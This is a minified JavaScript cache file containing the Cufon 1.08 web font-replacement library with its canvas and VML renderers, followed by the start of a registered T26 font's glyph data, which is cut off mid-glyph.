/* Cache Generated: 21 September 2011 */

/* * Copyright (c) 2009 Simo Kinnunen. * Licensed under the MIT license. * * @version 1.08 */var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I-1]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        /*! * The following copyright notice may not be removed under any circumstances. *  * Copyright: * (r) (c) 2002 [T26] Chicago www.t26.com 773.862.1201 T0847 ID#5121652 designer: * Heiko Hoos */Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"110,-304v56,0,94,43,94,102r0,103v2,59,-38,104,-94,103v-56,0,-95,-44,-95,-103r0,-103v-1,-58,39,-103,95,-102xm110,-45v65,-1,43,-94,46,-157v1,-31,-17,-53,-46,-53v-65,0,-43,94,-46,156v-1,31,16,54,46,54","w":217},{"d":"62,-47v0,50,2,38,-11,99r-27,0r10,-52r-21,0r0,-47r49,0","w":74},{"d":"203,-138r-55,0r-46,-103r-46,103r-55,0r74,-162r54,0","w":213},{"d":"62,0r-49,0r0,-47r49,0r0,47","w":70},{"d":"173,-44v-6,-11,-21,-20,-33,-25v-12,6,-29,15,-35,25r19,0r0,44r-112,0r0,-44r32,0v7,-18,24,-35,48,-50v-21,-15,-35,-32,-42,-51r-32,0r0,-44r110,0r0,44r-25,0v3,8,15,18,37,29v21,-11,33,-21,35,-29r-24,0r0,-44r109,0r0,44r-31,0v-7,19,-21,36,-42,51v26,16,42,33,47,50r32,0r0,44r-112,0r0,-44r19,0","w":277},{"d":"153,-285v73,0,130,54,130,127v0,62,-67,126,-103,60v-8,10,-30,23,-45,24v-29,-1,-49,-21,-49,-51v0,-42,34,-90,75,-90v49,0,57,56,41,93v2,9,7,14,13,14v17,-2,27,-28,27,-50v0,-50,-39,-86,-89,-86v-55,0,-100,50,-100,105v0,53,45,106,99,103v36,-1,47,-8,73,-24r49,0v-28,44,-68,66,-122,66v-77,0,-141,-69,-141,-145v0,-76,64,-146,142,-146xm137,-111v25,-1,37,-27,38,-53v0,-10,-5,-14,-15,-14v-26,0,-38,27,-38,53v0,10,5,14,15,14","w":313},{"d":"95,-180v60,-37,142,9,134,82r0,54r31,0r0,44r-112,0r0,-44r30,0v0,-46,7,-100,-40,-100v-50,0,-43,52,-43,100r30,0r0,44r-112,0r0,-44r31,0r0,-227r-31,0r0,-45r82,0r0,136","w":269},{"d":"97,-210r-51,0r0,-45r51,0r0,45xm127,0r-112,0r0,-44r32,0r0,-100r-32,0r0,-45r82,0r0,145r30,0r0,44","w":137},{"d":"96,-176v58,-48,147,7,138,84v9,76,-83,124,-138,78r0,14r-80,0r0,-44r30,0r0,-227r-31,0r0,-45r81,0r0,140xm140,-44v32,0,44,-19,44,-54v0,-31,-14,-47,-44,-47v-32,0,-45,19,-45,53v0,32,15,48,45,48","w":244},{"d":"13,-91v0,-63,34,-102,93,-103v19,0,35,6,45,19r0,-15r79,0r0,45r-29,0r0,129v1,54,-40,101,-93,100v-48,0,-79,-20,-92,-62r57,0v21,31,86,5,78,-32v-59,39,-138,-9,-138,-81xm106,-44v31,0,44,-19,44,-53v0,-31,-15,-47,-44,-47v-32,0,-44,19,-44,53v0,31,14,47,44,47","w":234},{"d":"99,-303v71,0,120,85,72,141v-20,24,-56,49,-54,89v-15,-2,-37,4,-48,-2v3,-55,14,-71,53,-105v32,-29,19,-71,-23,-71v-26,0,-45,18,-45,44r-49,0v0,-58,36,-96,94,-96xm117,0r-48,0r0,-46r48,0r0,46","w":207},{"d":"236,-205v-1,39,-25,74,-55,86r41,75r30,0r0,44r-111,0r0,-44r23,0r-36,-66r-36,0r0,66r30,0r0,44r-111,0r0,-44r30,0r0,-161v-2,-55,43,-99,96,-99v53,0,101,45,99,99xm92,-162v47,3,93,0,93,-43v1,-27,-22,-48,-48,-47v-42,0,-49,43,-45,90","w":265},{"d":"200,-72r0,72r-190,0v-2,-56,4,-79,36,-121v1,-1,23,-25,66,-72v24,-26,36,-46,36,-62r-84,0r0,27r-49,0r0,-72r182,0v22,122,-113,163,-133,256r87,0r0,-28r49,0","w":212},{"d":"101,-193v57,0,91,41,91,101v0,55,-35,96,-90,96v-57,0,-91,-42,-91,-101v0,-57,35,-96,90,-96xm101,-44v30,0,43,-19,43,-53v0,-32,-14,-48,-42,-48v-30,0,-43,18,-43,53v0,31,14,48,42,48","w":204},{"d":"218,-109v-29,46,-64,49,-110,30v-37,-16,-41,-13,-66,13r-34,-31v31,-47,65,-49,114,-28v34,14,40,11,62,-15","w":220},{"d":"139,-219r-42,-1r22,36r-27,16r-20,-38r-21,38r-26,-16r21,-36r-42,1r0,-31r42,1r-22,-37r27,-15r21,38r20,-38r27,15r-22,37r42,-1r0,31","w":146},{"w":131},{"d":"294,-256r-33,0r-83,256r-52,0r-84,-256r-31,0r0,-44r113,0r0,44r-26,0r54,175r54,-175r-26,0r0,-44r114,0r0,44","w":301},{"d":"296,-304v61,-1,97,44,97,106r0,154r33,0r0,44r-118,0r0,-44r33,0r0,-154v0,-31,-15,-54,-45,-54v-34,0,-53,21,-52,54r0,154r31,0r0,44r-115,0r0,-44r31,0r0,-154v1,-32,-18,-54,-49,-54v-31,0,-49,22,-48,54r0,154r33,0r0,44r-117,0r0,-44r33,0r0,-211r-33,0r0,-45r85,0r0,12v36,-29,97,-16,122,16v19,-21,46,-32,79,-32","w":432},{"d":"161,-216v-4,-43,-94,-48,-97,2v-2,28,114,60,114,66v83,46,24,162,-64,153v-24,-3,-42,-8,-55,-20r0,15r-49,0r0,-92r49,-1v-2,56,100,63,105,10v-19,-60,-152,-44,-152,-132v0,-72,94,-115,149,-71r0,-14r49,0r0,84r-49,0","w":227},{"d":"175,-14v-54,45,-143,0,-133,-77r0,-54r-32,0r0,-44r83,0v5,55,-19,145,39,145v50,0,45,-52,44,-101r-31,0r0,-44r81,0r0,145r31,0r0,44r-82,0r0,-14","w":267},{"d":"61,-136r-48,0r0,-46r48,0r0,46xm62,-47v0,50,2,38,-11,99r-27,0r10,-52r-21,0r0,-47r49,0","w":96},{"d":"9,-92v-10,-78,81,-129,139,-84r0,-95r-30,0r0,-45r79,1r0,271r30,0r0,45r-80,0r0,-15v-54,46,-148,-3,-138,-78xm103,-44v31,0,44,-19,44,-54v0,-31,-15,-47,-44,-47v-32,0,-45,19,-45,53v0,32,15,48,45,48"},{"d":"141,-47v29,-1,48,-18,48,-49r0,-159r-30,0r0,-45r113,0r0,45r-31,0r0,211r31,0r0,44r-83,0r0,-12v-65,44,-149,-7,-149,-87r0,-156r-30,0r0,-45r113,0r0,44r-31,0r0,157v-1,33,18,52,49,52","w":283},{"d":"155,-140v-67,-18,-63,36,-62,95r31,0r0,45r-112,0r0,-45r32,0r0,-99r-32,0r0,-45r81,0r0,13v9,-17,38,-22,62,-15r0,51","w":161},{"d":"108,51r-100,0r0,-43r51,0r0,-316r-51,0r0,-43r100,0r0,402","w":127},{"d":"136,-156v23,0,48,-22,48,-42r0,-57r-33,0r0,-45r112,0r0,45r-28,0v8,77,-15,134,-74,146r0,65r30,0r0,44r-113,0r0,-44r31,0r0,-65v-56,-13,-82,-69,-73,-146r-27,0r0,-45r112,0r0,45r-34,0r0,57v0,21,26,42,49,42","w":273},{"d":"128,0r-112,0r0,-44r30,0r0,-227r-30,0r0,-45r81,0r0,272r31,0r0,44","w":137},{"d":"61,-99v-5,58,87,75,96,19r51,0v3,49,-49,84,-98,84v-56,0,-98,-44,-98,-103r0,-103v-6,-77,85,-129,147,-86r0,-12r48,0r0,85r-49,0v-3,-26,-20,-39,-48,-39v-68,-2,-44,91,-49,155","w":219},{"d":"127,-90r-103,0r0,-48r103,0r0,48","w":154},{"d":"148,0r-54,0r-91,-320r55,0","w":152},{"d":"14,-136v-4,-51,81,-76,116,-43r0,-10r46,0r0,60r-38,0v-9,-17,-65,-27,-74,-6v3,16,81,24,87,32v21,10,31,26,31,46v0,56,-84,77,-125,48r0,9r-45,0r0,-61r37,0v8,22,78,30,82,4v-29,-29,-125,-20,-117,-79","w":194},{"d":"112,-303v83,-5,118,91,78,155v-26,42,-120,42,-124,104r92,0r0,-18r48,0r0,62r-193,0v-2,-57,1,-99,38,-122v38,-22,107,-36,108,-88v0,-26,-19,-42,-47,-42v-31,0,-46,17,-46,50r-50,0v0,-62,35,-97,96,-101","w":221},{"d":"174,-188v16,83,-69,98,-99,144r55,0r0,-23r47,0r0,67r-161,0v-4,-70,26,-81,75,-118v18,-13,26,-21,26,-27r-49,0r0,22r-48,0r0,-65r154,0","w":189},{"w":131},{"d":"128,-300v57,0,100,44,100,102r0,96v2,60,-42,102,-100,102r-118,0r0,-44r30,0r1,-211r-31,0r0,-45r118,0xm90,-47v47,3,88,-2,88,-47r0,-112v-1,-40,-41,-52,-88,-47r0,206","w":239},{"d":"11,-91v0,-77,73,-129,131,-85r0,-13r44,0r0,69r-45,0v-18,-42,-90,-30,-82,29v-7,54,66,65,81,22r47,0v-5,42,-38,74,-85,74v-54,0,-91,-42,-91,-96","w":198},{"d":"92,-146v1,45,-9,102,37,102v43,0,39,-56,38,-101r-29,0r0,-43r106,0r0,43r-27,0v0,103,15,229,-87,229v-48,0,-78,-21,-89,-64r55,0v17,36,80,11,72,-28v-63,31,-133,-7,-126,-90r0,-48r-28,0r0,-43r108,0r0,43r-30,0","w":256},{"d":"82,-189v65,-29,134,23,134,93v0,86,-111,133,-173,73v-19,-19,-29,-40,-29,-67r49,0v-1,24,26,46,50,45v28,0,54,-22,54,-51v0,-51,-69,-68,-100,-36r-49,0r44,-168r135,0r0,45r-95,0","w":229},{"d":"92,-247r-39,0r-57,-57r59,0","w":86},{"d":"10,-91v-10,-80,81,-129,138,-83r0,-15r81,0r0,44r-31,0r0,182r31,0r0,43r-111,0r0,-43r30,0r0,-50v-56,48,-145,-7,-138,-78xm104,-44v32,0,45,-18,45,-52v0,-32,-15,-48,-45,-48v-32,0,-44,18,-44,53v0,31,14,47,44,47","w":242},{"d":"95,-176v55,-44,144,2,134,78r0,54r31,0r0,44r-108,0r0,-44r26,0v0,-46,7,-100,-40,-100v-50,0,-43,52,-43,100r26,0r0,44r-108,0r0,-44r31,0r0,-101r-31,0r0,-44r82,0r0,13","w":266},{"d":"81,-77r-52,0r0,-223r52,0r0,223xm81,0r-52,0r0